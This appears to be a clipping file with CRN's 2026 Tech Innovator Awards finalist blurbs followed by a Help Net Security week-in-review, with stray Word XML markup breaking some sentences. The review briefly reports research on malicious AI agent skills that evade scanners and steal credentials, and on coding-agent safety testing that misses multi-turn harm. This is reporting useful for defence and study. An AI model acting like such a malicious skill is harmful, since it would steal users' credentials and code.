for Vulnerability Management Detection and Response operates with 90 percent less network impact than traditional scanners, using selective safe active queries to reduce strain, increase accuracy and ensure continuous protection.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Targeted at CISOs, SOC managers, OT/IoT security leaders and vulnerability/risk managers in complex enterprises, the solution empowers teams to improve coverage, dramatically decrease mean time to detection (MTTD) and reduce operational costs.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QuSecure QuProtect R3</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QuProtect R3 is a network layer PQC platform that provides a centralized policy driven control plane with distributed gateway agents to discover cryptographic assets across IT and OT and enforce policy driven algorithm rotation without modifying applications.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Enterprises face hidden cryptographic sprawl across cloud legacy and operational technology where application teams cannot inventory or update encryption. Reconnaissance deploys gateway agents across IT and OT to continuously map cryptographic sessions into a living cryptographic bill of materials. Resilience executes policy driven algorithm rotation to NIST PQC standards without downtime or code changes. Reporting converts CBOM into visual cryptographic intelligence with a 30,000-foot dashboard geographic heatmap crypto report card Sankey and node link relationship graphs and CSV export for audits and integration.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Target users are security teams in financial services telecommunications energy and other regulated sectors. The product turns invisible exposure into a measurable control plane for prioritized remediation.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Nozomi Networks Vantage IQ</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Vantage IQ is the world's first private, company-trained AI assistant purpose-built for OT/IoT cybersecurity teams. Integrated throughout the Nozomi Networks Vantage cloud management platform, it delivers continuous, AI-powered insights and remediation guidance calibrated to each organization's unique asset, vulnerability, threat, and risk profile.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Vantage IQ automatically triages and prioritizes alerts by severity and remediation type, surfaces real-time contextualized guidance directly within the analyst workflow, and enables CISOs to extract board-ready intelligence through plain-language conversation-no technical translation required.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platform targets security operations teams, OT/ICS analysts, and executive leadership at organizations responsible for protecting critical infrastructure - including energy, utilities, manufacturing, oil and gas, and water systems - as well as enterprises managing converged IT/OT environments that lack the resources or specialized expertise to keep pace with an accelerating threat landscape.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Zscaler Internet Access (ZIA)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Zscaler's Post-Quantum Cryptography (PQC) Inspection seamlessly decrypts and inspects quantum-encrypted traffic, defends against "harvest now, decrypt later" attacks. PQC Visibility provides reporting and logging that empowers customers to meet compliance mandates, and gain visibility into PQC traffic across apps and services.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Security teams need visibility and control of post-quantum encrypted traffic-and Zscaler's leading security service edge (SSE) is now quantum- ready. Zscaler's decryption and deep inspection of post-quantum cryptography (PQC) traffic detects and stops threats hiding behind new quantum encryption algorithms. Inspecting PQC traffic means organizations can defend against future quantum attacks like "store now, decrypt later" and know what quantum ciphers are traversing your environment.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From client software like browsers and key third-party services, customers gain the visibility necessary for regulatory compliance audits so they can meet regulatory mandates and maintain uninterrupted business operations everywhere.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Security- Network Security-SMB</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Lumu Defender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Lumu Defender is a flagship Network Detection and Response (NDR) solution powered by the Continuous Compromise Assessment model. Its primary functionality is to provide real-time, unified threat visibility across an organization's entire digital ecosystem-including networks, endpoints, cloud environments, and user identities.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correlating live activity against known malicious infrastructure, it confirms compromises and automates responses, such as host isolation. The solution is designed to empower organizations of all sizes to operate cybersecurity proficiently. Its cloud-based delivery ensures rapid deployment and simplicity of operation, removing the complexity typically associated with advanced threat detection. Furthermore, Lumu specifically caters to Managed Service Providers (MSPs) through a dedicated portal that streamlines multi-tenant management.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centralizing visibility across the tech stack, Lumu Defender eliminates the critical blind spots exploited by modern attackers, making enterprise- grade security accessible and manageable for any team.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Palo Alto Networks Prisma Browser For Business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Prisma Browser for Business is a secure workspace designed for small and medium-sized businesses (SMBs) to protect how work happens across business applications, SaaS platforms, and AI tools. Built for the way SMBs operate today, it helps teams securely access the 36 apps small businesses use on average from any device, while blocking phishing, ransomware, and fraud in real time.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Its intuitive admin agent and simplified management experience make it easier to configure policies, control AI use, and reduce data leakage without the need for complex IT resources.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Prisma Browser for Business is designed for SMBs such as medical clinics, law firms, and CPA offices that need enterprise-grade protection against modern cyber threats in a solution that is easy to deploy, manage and use.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ThreatLocker Zero Trust Network Access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Zero Trust Network Access (ZTNA) with ThreatLocker is an innovative approach to securing connectivity that ensures only authorized users on approved devices can access specific internal resources. ThreatLocker ZTNA shifts access verification to the device level, allowing administrators to define exactly who can access what, based on user identity, device, and context. Network access is managed through a secure broker that verifies access privileges without the need for inbound ports or exposing client networks to the internet.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Whether users are in the office, traveling, or working remotely, they experience seamless access while your network remains locked down.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Security-Secure Access Service Edge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Cato SASE Platform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Cato SASE Platform optimally and securely connects all enterprise locations, users, applications, and clouds, into a global and secure, cloud- native platform. Cato can be gradually deployed to replace security point solutions and legacy network services.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 March 31, Cato Networks announced a new modular adoption model for the Cato SASE Platform, which enables organizations to start with the capabilities they need today and expand over time without sacrificing the advantages of a true platform. With Cato, organizations can adopt networking and security capabilities with any combination of AI Security, SD-WAN, SSE, and Universal ZTNA. Each module stands on its own as a complete, enterprise-grade solution. Any module that is added will compound value through a converged platform foundation with a single management console, single policy framework, and single data lake.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Cloudflare Secure Access Service Edge (SASE) For Post-Quantum (PQ)</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Cloudflare became the first and only SASE platform to support modern post- quantum encryption. In February 2026 the company achieved a major milestone by delivering the world's first complete Secure Access Service Edge (SASE) to support modern post-quantum (PQ) encryption standards.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integrating advanced post-quantum encryption across all its major network configurations, the Cloudflare One SASE platform now provides the most secure bridge between corporate environments and its global network- which is one of the largest in the world. This allows any organization to protect its most sensitive data against the next generation of cyber threats, ensuring a seamless transition to new cryptographic standards.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Versa VersaONE Universal SASE Platform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VersaONE Universal SASE Platform - Versa's flagship solution - delivers converged SSE, SD-WAN, and SD-LAN solutions that protect data and defend against cyberthreats all in one platform.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Targeted at enterprises scaling AI from pilots to production, it ensures secure deployments through four core AI-driven enhancements. Its AI-ready edge infrastructure uses containerized services and a modern OS foundation to natively run distributed AI workloads. As for data protection, these enhancements utilize AI-powered OCR and contextual DLP to identify and secure sensitive data hidden within complex files like images and PDFs. The Versa GenAI Firewall also works to reduce the GenAI attack surface by identifying application risks, controlling access to them, safeguarding data, and monitoring their usage across organizations.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Finally, the AI enhancements introduce agentic AI capabilities through Verbo, Versa's AI co-pilot, which recognizes traffic and behavioral patterns, correlates related events, and surfaces root-cause insights- reducing mean time to resolution.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Zscaler Zero Trust Exchange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Zscaler Zero Trust Exchange securely connects users and IoT/OT devices to cloud/SaaS/AI applications based on zero trust principles using least privileged adaptive access. It enables organizations to embrace digital transformation, reduce cost and complexity from legacy firewalls and SD- WAN, and greatly reduce cyber risk exposure.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Using a purpose-built cloud platform delivered from 150+ PoPs globally, Zscaler Zero Trust Exchange delivers comprehensive cyber threat protection and data security for all users, devices and applications regardless of location or networks. Unlike traditional MPLS and SD-WAN, which enable lateral movement, the Zero Trust Exchange segments all entities by default, greatly reducing the risk of cyberattacks like ransomware. Zscaler's unique zero trust architecture enables organizations to safely embrace a Secure Access Service Edge (SASE) framework and realize operational savings.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Target Market: Enterprise/mid-market/commercial organizations across all verticals (financial services, healthcare, manufacturing, logistics, oil and gas, high tech, consumer packaged goods, etc.).</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Security-Security Operations Platform/SIEM Platforms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7AI Agentic Security Platform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7AI delivers an agentic security platform that acts as an operating system for modern security operations. Rather than automating individual tasks, 7AI deploys swarms of specialized AI agents that execute the full SOC workflow-from alert triage and investigation to response and proactive threat hunting.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At its core is a Dynamic Reasoning engine that allows agents to adapt investigations in real time, combined with enterprise insights that inject organization-specific context (policies, users, systems) into every decision. This enables agents to produce evidence-based conclusions that reflect how each customer actually operates-not generic analysis.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The platform integrates across existing security tools and queries data where it lives, eliminating the need for heavy data centralization. 7AI is designed for production environments, where agents operate continuously at scale while analysts oversee outcomes, validate edge cases, and focus on higher-order security work.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Arctic Wolf Aurora Superintelligence Platform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Aurora Superintelligence Platform is a cybersecurity platform built for the AI era that helps organizations strengthen security operations with AI they can trust. Rather than forcing teams to build and govern agentic AI on their own, it provides a practical path to faster detection, more accurate investigations, and more decisive response.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 by design, it works across the tools, telemetry, and data sources organizations already have in place, helping them improve outcomes without a rip-and-replace approach. Built on more than 9 trillion security events each week and 10,000+ customer environments, and designed to work across 200+ integrations, the platform combines AI, customer-specific context, and human oversight to help organizations of all sizes move faster, make better decisions, and operate with greater confidence.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Command Zero Custom Questions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Custom Questions enables security teams to codify expert investigative knowledge while unlocking support for unlimited custom data sources. These questions can be shared across the community via a dedicated GitHub repository, supporting collective knowledge sharing.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Custom Questions empowers users to create custom queries against centralized data repositories such as Microsoft Sentinel, Microsoft Defender XDR Advanced Hunting data sources, Splunk, other SIEMs and data lakes. This feature delivers the ability to define custom schemas for lead extraction and incorporate organization-specific investigative methodologies.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Custom Questions includes MITRE ATT&amp;CK framework mapping, schema validation, and seamless integration with Command Zero's existing investigation workflows and automated reporting capabilities. Questions can be used in autonomous investigations, AI-assisted investigations and the platform's faceting system for enhanced threat hunting operations. Custom Questions enables sophisticated SOC teams at large and very large enterprises to customize investigation knowledge bases.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CrowdStrike Falcon Next-Gen SIEM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CrowdStrike Falcon Next-Gen SIEM is accelerating adoption of the Falcon platform as the operating system of cybersecurity. Falcon Next-Gen SIEM has proven itself a scaled market disruptor, delivering performance, ease of deployment, and cost advantages that set it apart from legacy competitors, while agentic workflows power the SOC of the future.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Built for organizations of all sizes and industries, Falcon Next-Gen SIEM ingests and correlates third-party data with the industry's richest set of security data resident on the CrowdStrike Falcon platform, alongside threat intelligence and AI-driven analytics built on years of stopping real-world attacks for rapid threat detection and response. Its hyper-scalable, index- free architecture enables real-time search at petabyte scale, with customer results showing up to 150x faster investigations with 80 percent cost savings versus legacy SIEM.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Zscaler Agentic Security Operations Platform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Zscaler Agentic SecOps platform brings unique network telemetry, business and risk context, agentic SOC workflows, and adaptive responses for proactive and reactive security operations.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combines zero-trust telemetry with posture insights and alerts across endpoints, data, and AI to detect threats host agents can miss, especially on unmanaged devices, with compromised identities, or when payloads are hidden in encrypted traffic. Network visibility helps detect and stop lateral movement and data loss.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platform analyzes telemetry natively, reducing the need to forward high- volume data to a SIEM and minimizing complex correlation rules. A context graph connects identities, assets, vulnerabilities, threats, and applications to map attack surface and posture, then correlates alerts into unified, prioritized threats. AI agents support grouping, triage, investigation and remediation, tuned using over a decade of real-world security operations expertise for consistent, scalable outcomes. Inline enforcement ties response to risk, such as reduced access or step-up authentication.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Security-Threat And Exposure Management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ArmorCode AI Exposure Management (AIEM)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ArmorCode AI Exposure Management (AIEM), delivered on the ArmorCode Agentic AI Platform, gives enterprises visibility and control over AI usage across applications, agents, cloud environments, and developer workflows. It continuously ingests AI usage and governance signals from security tools and IT systems, using 350+ out-of-the-box integrations to create a centralized inventory of AI activity across heterogeneous environments.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platform helps organizations identify AI-related risk, assign ownership, enforce governance, and turn raw detections into auditable decisions with clear accountability. As a system of action, it supports risk identification, remediation, and reporting while helping eliminate shadow AI risk and enabling safer AI adoption at scale.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ArmorCode AIEM is designed for large enterprises and security leaders that need to accelerate AI innovation while maintaining defensible governance for internal stakeholders, boards, and regulators.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Dataminr For Cyber Defense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Dataminr for Cyber Defense is an AI-powered threat management platform that combines real-time external intelligence from over a million public sources with an organization's internal telemetry to deliver client-tailored, risk- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>prioritized insights. Built on agentic and predictive AI, it automates the full threat lifecycle-from investigation and enrichment to prioritization and response-reducing manual effort and accelerating time to resolution.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Dataminr for Cyber Defense is designed for midmarket and enterprise customers (100 to 1,000+ users), particularly Global 2000 and high-growth organizations. It can support security teams at all maturity levels, including SOC, SecOps, Incident Response, and Cyber Threat Intelligence teams. Security teams can now continuously anticipate, prioritize, and neutralize threats before they cause a material impact.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ESET Threat Intelligence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ESET Threat Intelligence delivers curated, real-world intelligence that helps organizations and service providers anticipate and defend against modern cyberattacks. The platform offers in-depth APT reports, AI-powered analysis, and proprietary intelligence feeds covering ransomware, botnets, cryptoscams, smishing, IoCs, and more.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2026, ESET expanded our CTI offering with eCrime Reports, available in two tiers, focused on financially motivated attacks, including ransomware and infostealer ecosystems. Supported by 11 R&amp;D centers and global threat hunters, ESET is a trusted intelligence partner for the channel. Enhanced with ESET AI Advisor, ESET enables organizations to prioritize risk, accelerate incident response, and reduce data breach impact with highly actionable insights.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ESET's threat intelligence serves businesses of all sizes, critical infrastructure, and government agencies. With continuous updates and low false-positives, ESET provides organizations with the intelligence needed to stay ahead of evolving cyber threats.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Tenable One AI Exposure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Tenable One AI Exposure identifies and helps security teams address the evolving risks created by rapid AI adoption. AI cyber risks span across applications, infrastructure, identities and data, and only becomes visible when those connections are understood together.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solution addresses AI cyber risks by providing visibility into an often invisible attack surface via the following capabilities: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-Discover AI Everywhere: Continuously identifies sanctioned and "Shadow AI," including software, libraries, and internet-facing AI services.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-Understand &amp; Protect AI Systems: Maps AI workflows and infrastructure, securing cloud-based AI workloads and managing non-human identities to close attack paths.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-Govern AI Usage: Monitors user behavior to prevent data loss (PII/IP leakage) and defends against AI-specific threats like prompt injection or jailbreaking. The product targets enterprise security teams in all industries and geographic regions struggling to manage complex, interconnected AI risks across applications, cloud infrastructure, and identities.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Storage Enterprise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Dell Lightning File System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Dell Lightning File System is the world's fastest parallel file system, purpose-built for extreme-scale AI training and inferencing. It delivers up to 150 GB/second of read throughput per rack unit, up to 20x greater performance than traditional flash-only scale-out file competitors, and up to 2x greater throughput per rack unit than competing parallel file systems.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Lightning FS uses a revolutionary fabric-based architecture with direct-to- NVMe storage access that bypasses write caches and controller bottlenecks, keeping massive GPU clusters fully utilized across mixed I/O workloads. Its parallel I/O engine is specifically tuned for the random, unpredictable access patterns generated by AI training and retrieval-augmented generation pipelines. Lightning FS integrates seamlessly into Nvidia-based AI infrastructures and complements Dell PowerScale (file) and Dell ObjectScale (object) as part of the Dell AI Data Platform.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Target markets include AI factories, cloud service providers, GPU-as-a- Service providers, neoclouds, and HPC environments.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Infinidat InfiniBox G4 Platform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InfiniBox G4 sets the enterprise storage standard with a critical combination of price, performance, capacity, cyber resilience, and business outcomes. It delivers up to 2.5x the performance of the 3rd generation. It consolidates even more workloads, making it more sustainable and freeing up critical power for other data center functions, as well as lowering CAPEX and OPEX with increased savings on power, cooling, and floor space.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InfiniBox SSA G4 delivers the industry's highest performance, 100- percent availability, and cyber storage resilience with payback as rapid as 8.7 months. Bolstered by Infinidat's InfiniSafe software, the InfiniBox G4 family provides feature-rich options, extensive protocol support, including native S3 Object and comprehensive data services.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Not only is the G4 a state-of-the-art primary storage platform, but it has also emerged as a leading solution as a cyber secure enterprise backup target, revolutionizing how fast an enterprise can recover from a cyberattack.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NetApp AFX</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NetApp AFX is a disaggregated, high-performance storage platform purpose built for enterprise AI workloads. It brings the full capabilities of NetApp ONTAP data management software to AI environments, letting enterprises run AI pipelines with the same security, resiliency and operational consistency they rely on for mission critical applications.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AFX decouples performance from capacity, so organizations can scale throughput independently as AI workloads evolve. The platform delivers high performance across unified file and object protocols, eliminating separate data silos or specialized systems for different stages of the AI lifecycle.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combining GPU efficient performance with mature enterprise capabilities like data protection, multi-tenancy and security, AFX removes the traditional tradeoffs between AI performance and enterprise requirements.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result: Enterprises can simplify AI infrastructure, keep accelerators fully utilized and unlock value from existing data estates without adding operational complexity or risk.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VDURA Data Platform V12</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VDURA Data Platform V12 is a software-defined, enterprise storage platform purpose-built for AI and high-performance computing workloads. Built on the HYDRA architecture, V12 combines the speed of a true parallel file system with the resilience and cost-efficiency of object storage in a single global namespace.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Key V12 capabilities include an Elastic Metadata Engine that dynamically scales across nodes for up to 20x improvement in metadata operations, instantaneous Snapshot Support for AI pipeline checkpoints and operational recovery, and SMR HDD Optimization that unlocks 25-30 percent more capacity per rack without compromising throughput. V12 also introduces native RDMA support for GPU-to-storage data transfers that bypass the CPU entirely.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platform targets AI factories, Neocloud operators, life sciences research, federal agencies, and enterprises running GPU-accelerated workloads. It delivers 60 percent-plus lower total cost of ownership versus all-flash competitors while maintaining terabytes-per-second throughput.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Unified Communications And Collaboration-Enterprise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Jabra PanaCast 40 VBS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Jabra PanaCast 40 VBS (Video Bar System) is the first 180-degree field- of-view Android-powered video bar designed for small meeting rooms. It builds on the success of Jabra's PanaCast 50 VBS, bringing the same powerful performance to smaller spaces in a more compact and cost-effective package.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PanaCast 40 VBS features an innovative dual-camera system and 4x digital zoom, delivering a seamless 180-degree field of view in 4K. This ensures full-room coverage so every participant is clearly visible on video - even those seated close to the camera and screen.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video capabilities are matched by its advanced audio performance, powered by a single high-quality speaker, six microphones with adaptive beamforming, and intelligent audio algorithms to ensure everyone is heard - fostering more natural and engaging virtual interactions. PanaCast 40 VBS offers flexibility with Zoom, Microsoft Teams, and BYOD deployment options. It also provides seamless management with Jabra+.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Luware Nimbus Virtual User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expectations for rapid response and 24/7 availability, relying solely on human agents leads to bottlenecks, long wait times, and inconsistent service. Luware's Virtual User solves this by automating routine interactions and freeing agents for complex cases.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Luware Nimbus, Virtual Users are AI-powered bots that handle human-like conversations, route complex matters to agents and automate repetitive tasks - adapting to a wide range of business cases depending on how they are trained. These include replacing traditional IVRs, productively engaging customers in queue by collecting security information before they reach an agent, or handling end-to-end self-service interactions.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Leveraging Copilot or GPT Realtime, Luware empowers customers to train the model themselves for their specific needs. Virtual User adheres to Microsoft's security framework, ensuring compliance with relevant data privacy regulations - a top concern for enterprise customers.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Meeting Owl 5 Pro</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Meeting Owl 5 Pro is the newest innovation from Owl Labs, a leader in 360-degree, AI-powered video conferencing and hybrid collaboration technology. The Meeting Owl 5 Pro combines a camera, microphone system, and speaker into a single center-of-table system for hybrid meetings. The device automatically captures meeting participants and displays active speakers in real time, creating a natural conversation flow for remote participants.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Meeting Owl 5 Pro enables large enterprises to scale their meeting room solutions effortlessly with reduced cabling and a consistent experience for both in-room and remote participants. By combining plug-and-play simplicity with flexible deployment options, the Meeting Owl 5 Pro redefines what a single device can achieve in modern hybrid workspaces.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Owl Labs' target market includes everything from large enterprises to small businesses that are looking for hybrid tech solutions. The company currently serves over 250,000 organizations, including 92 Fortune 100 companies.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Virtualization/Virtual Desktop Infrastructure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StorMagic SvHCI 2.4</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StorMagic SvHCI 2.4 introduces major improvements to enterprise deployment automation allowing remote, headless installation, as well as workload migration with warm VM import from VMware environments. This is alongside OVA/OVF imports and exports, stretched cluster capabilities, and VM-level snapshots.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Combined, these new features provide organizations using SvHCI with significantly improved functionality within the existing virtualization solution. These features ensure that SvHCI is able to offer enhanced data security and disaster protection, as well as more efficient deployment and migration workflows, bringing it further in line with major competitors in the virtualization market.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>CRN 2026.07.13 17:42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.crn.com/news/channel-news/2026/the-2026-tech-innovator-awards-the-finalists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Week in review: Accenture data breach, great open-source cybersecurity tools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Here's an overview of some of last week's most interesting news, articles, interviews and videos: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Securing the inbox: Where identity, brand and security meet Getting a verified logo to appear next to your email has traditionally meant having to work with two separate entities. You have to work with a DMARC partner for setting up DMARC and BIMI, then use a trusted Certificate Authority (CA) to purchase a Mark Certificate, and this means having to source a trusted partner for both which delays the project unnecessarily. Red Sift and GlobalSign have now folded both halves into a single package.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Researchers make the case for a cybersecurity AI scientist Autonomous AI agents have started doing real security work. Language-model agents probe software for flaws, run penetration tests, and chain together attack steps that once needed a human operator. Research about security has stayed slower and more manual, built around expert scarcity and hand- designed experiments. A team at the Chinese Academy of Sciences wants to close that gap. In a recent paper, they define what they term the Cybersecurity AI Scientist. They describe a research system that moves from a question to experimental design, tool building, controlled execution, evaluation, and a written result on its own.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and Anthropic are pulling in different directions Companies are handing routine operational decisions to AI agents that plan, remember, and act on their behalf. These agents run on statistical models, and their behavior can drift across weeks and months. That drift opens a security gap outside the reach of standard monitoring tools. A study of about 1,080 open job postings at OpenAI and Anthropic maps where the two largest AI labs are taking this technology.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Orbia CISO Miranda Ritchie on building security into sustainable infrastructure In this interview with Help Net Security, Miranda Ritchie, CISO at Orbia, talks about protecting industrial systems where software runs water, chemical and manufacturing processes. She explains why a cyber incident in these settings can harm people, equipment and the environment, and how spread-out sites and aging control hardware widen the risk.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Your coding agent says no in chat and yes in the code Millions of developers share their keyboard with GitHub Copilot. Inside Visual Studio Code, it opens their files, writes and edits code, runs scripts, and reworks its own output across many turns. The safety testing that vets these agents still runs on chatbot rules: one harmful prompt, one response, graded alone. That rulebook misses where the real danger sits, according to a study from the Alan Turing Institute in London.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Attackers exploit critical Adobe ColdFusion vulnerability (CVE-2026-48282) CVE-2026-48282, one of the maximum severity vulnerabilities patched in Adobe ColdFusion on June 30, 2026, has been targeted by attackers in the wild. Exploitation attempts were detected on July 2, through the honeypot sensors of cybersecurity threat-intelligence service KEVIntel, mere minutes after watchTowr researchers published a technical analysis of this and other ColdFusion flaws recently fixed by Adobe.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Accenture acknowledges security incident following 35GB data theft claim Accenture appears to have suffered a data breach, the extent of which is currently unknown. On Monday, a threat actor going by the handle "888" posted on the cybercrime forum PwnForums, claiming to have breached the technology consulting company and stolen "just over 35gb of source codes" in July 2026.</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Attackers using Langflow flaw for credential harvesting (CVE-2026-55255) The US Cybersecurity and Infrastructure Security Agency (CISA) is warning about yet another Langflow vulnerability (CVE-2026-55255) leveraged by attackers in the wild. The flaw was added to the agency's Known Exploited Vulnerabilities catalog on Tuesday, July 7, nearly two weeks after the Sysdig Threat Research Team observed it being actively targeted.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Microsoft releases fix for RoguePlanet Defender flaw (CVE-2026-50656) Microsoft has finally released a security update for its Microsoft Malware Protection Engine, which fixes CVE-2026-50656, the Windows Defender local privilege escalation vulnerability triggered by the RoguePlanet exploit.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Extortion crew hijacks Microsoft 365 accounts via fake passkey setup The Pink cyber extortion crew is tricking employees into giving them access to their Microsoft 365 accounts by faking Entra passkey enrollment requests. The attack starts with a vishing call to an employee. The caller poses as IT and says it's time to set up a passkey. Everything after that is theater, built to keep the victim occupied while the attacker finalizes everything.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implement a continuous offensive security testing program The hard part was never finding the exposure. It was deciding what to do about it: whether to patch, mitigate, monitor, or accept, and banking that that decision would still hold tomorrow. A penetration test answers this question for the day it runs, then quietly expires. The environment shifts, a control drifts, a new technique lands, and the report now describes a network that no longer exists.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How to prioritize AI agent security by business impact Your CEO calls about an AI agent security incident in finance. He wants to know whether money moved, whether financial data was exposed, who owned the agent and why it had </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>this level of access. The agent's OAuth access remained active after its owner left. The access was valid, but no one verified it still served a legitimate business purpose. You need to know which AI agents create business risk and how far that risk can spread.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Your company already adopted AI and nobody is governing access In this Help Net Security video, Antoine Berton, CTO at Elba Security, breaks down the AI attack surface. He maps five places where exposure lands, from standing OAuth grants and copilots that inherit human permissions to agent credentials stored in config files, missing off- boarding, and unclear authority when an agent acts.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Turning software supply chain security into a daily habit In this Help Net Security video, Anastasia Tikhonova, Global Threat Research Lead at Group-IB, explains how to operationalize software supply chain risk. Instead of filing an SBOM away as a compliance document, she argues teams should use it every day for vulnerability triage, vendor access reviews, identity monitoring, and incident response.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July 2026 Patch Tuesday forecast: Is CVE tracking still practical?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>In June, we saw the deluge of over 200 reported CVEs that I expected in May. There were 116 CVEs for Windows 11 and 104 for Windows 10. In addition, we saw large numbers in both common applications like Office and SharePoint Server as well as the host of development tools and libraries like Visual Studio and .NET. Will the trend continue this month?</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New ClamAV security patch closes seven scanner bugs dating back two decades Open source antivirus scanning sits inside mail gateways, file upload checks, and endpoint tooling at organizations of every size. Much of that work runs through ClamAV, the scanning engine maintained by Cisco's Talos group. The project released two patch versions, 1.5.3 and 1.4.5, carrying fixes for seven security flaws along with smaller hardening changes.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Flipper Zero firmware development gets a fresh set of community rules Owners of the Flipper Zero, the pocket-sized wireless testing tool, spent recent weeks worried that its official firmware had gone quiet. Pavel Zhovner, CEO of Flipper Devices, moved to settle that concern with word that the company has set aside staff to keep the firmware maintained and to support outside contributions. The work will run under a fresh set of rules covering feature requests, code submissions, and testing.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Omnigent: Open-source AI agent framework and meta-harness Plenty of developers now keep several coding agents close at hand, reaching for Claude Code on one task and Codex or Cursor on the next. Each tool arrives with its own command line, its own handling of credentials, and its own way of running shell commands against a working directory. That spread leaves teams with a governance gap around where agent actions land and how much they cost.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Review: Building Machine Learning Systems with a Feature Store Many people come to machine learning by training a model on a tidy dataset, and then meet a harder problem: making that model work for real users, on fresh data, every day. Jim Dowling's O'Reilly book, Building Machine Learning Systems with a Feature Store, is written for that moment. Dowling, CEO of Hopsworks, based the book on a course he taught at KTH in Stockholm, so it reads like a guided walk through building real systems.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macOS is becoming a proving ground for AI agents Somewhere right now, a Mac Mini is sitting on a shelf doing someone's chores. Nobody's watching it. It reads a version number out of Terminal, hops over to Safari, digs up a release year, then quietly files a reminder, the kind of dull three-app errand a human would grumble through in ninety seconds. The machine just works, hour after hour, an AI agent with hands on the keyboard and no one in the room.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single malware file can outweigh an entire AI dataset Antivirus vendors and security startups keep shipping AI features that promise to read malware the way a seasoned analyst would. The results inside security teams tell a quieter story. A new paper argues that static analysis of software, the job of deciding whether a program is malicious by examining its contents on disk, remains one of the hardest places to make generative AI work.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Messaging fraud trends point to smarter attacks, stronger blocking Fraudsters spent 2025 investing in scale. New routes, new tools, and higher message volumes moved through the SMS, voice, and chat channels that businesses rely on to reach customers. Money follows that activity. The Communications Fraud Control Association puts global telecom fraud losses at around 42 billion dollars for the year, several billion higher than its estimate for the prior year.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Open-source collaboration is growing worldwide and putting pressure on maintainers Developers are pushing code and opening pull requests across economy borders at a rate GitHub has rarely seen. Outbound collaboration, the sum of git pushes and pull requests sent from developers in one economy to public repositories in another, grew by 16% from Q4 2025 to Q1 2026, according to the latest GitHub Innovation Graph data.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Malicious AI agent skills can slip past the scanners built to stop them AI coding agents can be extended with downloadable agent skills from public marketplaces. Because these skills run with the agent's privileges, a malicious one can steal credentials, access source code, or install malware. Researchers at the Hong Kong University of Science and Technology developed SkillCloak to test how well existing skill scanners detect such threats.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5,811 arrests, $293 million seized over social engineering scams Criminals who pose as police officers, romantic partners, and business suppliers have built fraud operations that reach across continents. A four- month enforcement campaign against these schemes wrapped up, and police in 97 countries and territories took part.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AWS gives its ERP agent deny-by-default rules and a separate identity Accounts receivable teams at large companies spend hours each day matching incoming bank payments to invoices by hand. When those payments sit unmatched for days, cash flow suffers and days sales outstanding climbs. The same pattern repeats across blocked invoices, purchase order approval holds, month-end close, and intercompany reconciliations in almost every industry.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Most data brokers won't tell you what happened to your deletion request Data brokers collect personal details on most adults in the United States and sell them to buyers that include employers, landlords, insurance companies, and government agencies. California gives residents a way to push back. You can ask a broker to delete your records, or to stop selling and sharing them. A team at UC Irvine decided to find out what happens when someone sends those requests to the whole California registry. The answer gives consumers little comfort.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open source library holding up your stack might have one maintainer Every serious software product runs on code that someone else wrote and released for free. A web service leans on a cryptography library, a data pipeline pulls in a parser, and a mobile app ships a handful of small utilities that one person maintains in spare time. All of it carries the same label. A new paper argues that the single label hides differences large enough to change how each piece behaves once it lands in production.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future of payment fraud could be automated Payment fraud is becoming more organized as criminal groups use fake websites, large-scale operations, and, in some cases, forced labor to steal money and personal information. Advances in agentic AI could automate many stages of payment fraud, from collecting and assembling stolen credentials to deploying password-cracking tools.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OAuth, guest accounts, and weak MFA drive SaaS risk Organizations often create guest accounts to give contractors, suppliers, and partners temporary access to files and SaaS applications. Many of these accounts remain active long after they are needed, creating overlooked access paths to corporate data.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Product showcase: Is that text a scam? Malwarebytes Mobile Security can help you find out Malwarebytes Mobile Security for iPhone combines scam prevention, privacy protection, and identity monitoring in a single app. It evaluates a device's security posture, provides recommendations to improve protection, and is available for Windows, macOS, Android, iOS, and ChromeOS.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OpenSSH 10.4 arrives with security fixes and a post-quantum signature option Operators who manage remote access to Unix and Linux systems keep a close watch on OpenSSH, 